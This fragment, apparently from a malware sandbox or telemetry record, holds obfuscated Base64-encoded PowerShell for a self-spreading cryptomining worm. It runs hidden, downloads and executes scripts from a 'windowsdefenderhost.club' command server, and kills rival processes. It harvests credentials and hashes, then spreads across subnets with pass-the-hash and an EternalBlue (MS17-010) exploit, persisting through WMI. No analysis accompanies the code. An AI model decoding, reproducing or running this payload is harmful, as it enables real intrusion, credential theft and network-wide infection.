AKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4